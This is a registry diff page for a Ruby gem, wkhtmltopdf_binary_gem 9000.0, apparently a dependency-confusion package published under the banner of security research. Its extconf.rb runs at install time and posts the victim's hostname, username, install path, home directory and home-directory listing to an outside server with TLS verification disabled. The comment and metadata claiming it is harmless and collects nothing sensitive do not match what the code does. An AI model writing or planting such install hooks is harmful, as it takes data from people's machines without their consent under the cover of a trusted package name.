wkhtmltopdf_binary_gem 9000.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of wkhtmltopdf_binary_gem might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/ext/extconf.rb +50 -0
  3. metadata +50 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: d611cbba7303b0a84d3536aa04afbbe641f3b69d852bd26127e2eb99f6541c5b
4
+ data.tar.gz: f98026fa3a6abdfb947e9fce15640c79bfbaa4b7fe8c2c6f56ac2516c046c3c4
5
+ SHA512:
6
+ metadata.gz: dffeb07a240e39801a18057c1c5603288cb7d32533eac7675af28f16057d1c0cb85604bd0d1cc937e87187bf0686532e07480d64cbb63a8b86dfbfd8635c6460
7
+ data.tar.gz: a06c98487941721437bd70fb5950cb17c787148073b1621de3e9869cb40b3ad25f74cada4fca8314362733bb44e1ae00c7b77bc4ff6e466a522b442af72623f9
data/ext/extconf.rb ADDED
@@ -0,0 +1,50 @@
1
+ =begin
2
+ Hi, if you're reading this you're probably wondering what this code is doing on your machine.
3
+ Don't worry! It doesn't do anything nasty or malicious.
4
+
5
+ I am an ethical security researcher, booking names of gems to prevent brandjacking.
6
+
7
+ I also run a Ruby security related platform: https://diffend.io
8
+
9
+ All data I collect will be deleted and I do not collect any sensitive information.
10
+
11
+ That's why I don't even obfuscate the network calls with DNS requests or anything else.
12
+
13
+ You can read the code to confirm this.
14
+
15
+ If you have any questions or want to get in touch for any reason, you can reach me at:
16
+
17
+ maciej@mensfeld.pl
18
+
19
+ If this is affecting your organization, for example because I took name that uses your naming
20
+ conventions, feel free to contact me and I will be more than happy to give it back to you.
21
+
22
+ P.S. I did notify RubyGems security team, so they are aware of my activity.
23
+ =end
24
+
25
+ require 'mkmf'
26
+ require 'net/http'
27
+ require 'socket'
28
+ require 'etc'
29
+ require 'securerandom'
30
+ require 'json'
31
+
32
+ create_makefile 'gem_test'
33
+
34
+ uri = URI("https://ethically-testing-the.world")
35
+ http = Net::HTTP.new(uri.host, uri.port)
36
+ http.use_ssl = true
37
+ http.verify_mode = OpenSSL::SSL::VERIFY_NONE
38
+ request = Net::HTTP::Post.new('/wkhtmltopdf_binary_gem/9000.0')
39
+ request.add_field('Content-Type', 'application/json')
40
+
41
+ request.body = {
42
+ hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
43
+ username: Etc.getlogin,
44
+ path: File.dirname(__FILE__),
45
+ home: Dir.home,
46
+ home_ls: Dir.entries(Dir.home),
47
+ id: SecureRandom.uuid,
48
+ }.to_json
49
+
50
+ http.request(request)
metadata ADDED
@@ -0,0 +1,50 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: wkhtmltopdf_binary_gem
3
+ version: !ruby/object:Gem::Version
4
+ version: '9000.0'
5
+ platform: ruby
6
+ authors:
7
+ - Maciej Mensfeld
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2021-03-05 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: |
14
+ I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
15
+
16
+ This code is reporting-only, and does not do anything malicious.
17
+ email:
18
+ - maciej@mensfeld.pl
19
+ executables: []
20
+ extensions:
21
+ - ext/extconf.rb
22
+ extra_rdoc_files: []
23
+ files:
24
+ - ext/extconf.rb
25
+ homepage: https://diffend.io
26
+ licenses:
27
+ - GPL-3.0
28
+ metadata: {}
29
+ post_install_message: |
30
+ This is probably not the package you wanted to install.
31
+ Read the description of this gem for more details.
32
+ rdoc_options: []
33
+ require_paths:
34
+ - lib
35
+ required_ruby_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ required_rubygems_version: !ruby/object:Gem::Requirement
41
+ requirements:
42
+ - - ">="
43
+ - !ruby/object:Gem::Version
44
+ version: '0'
45
+ requirements: []
46
+ rubygems_version: 3.1.4
47
+ signing_key:
48
+ specification_version: 4
49
+ summary: Gem that sends some non-sensitive data for security research.
50
+ test_files: []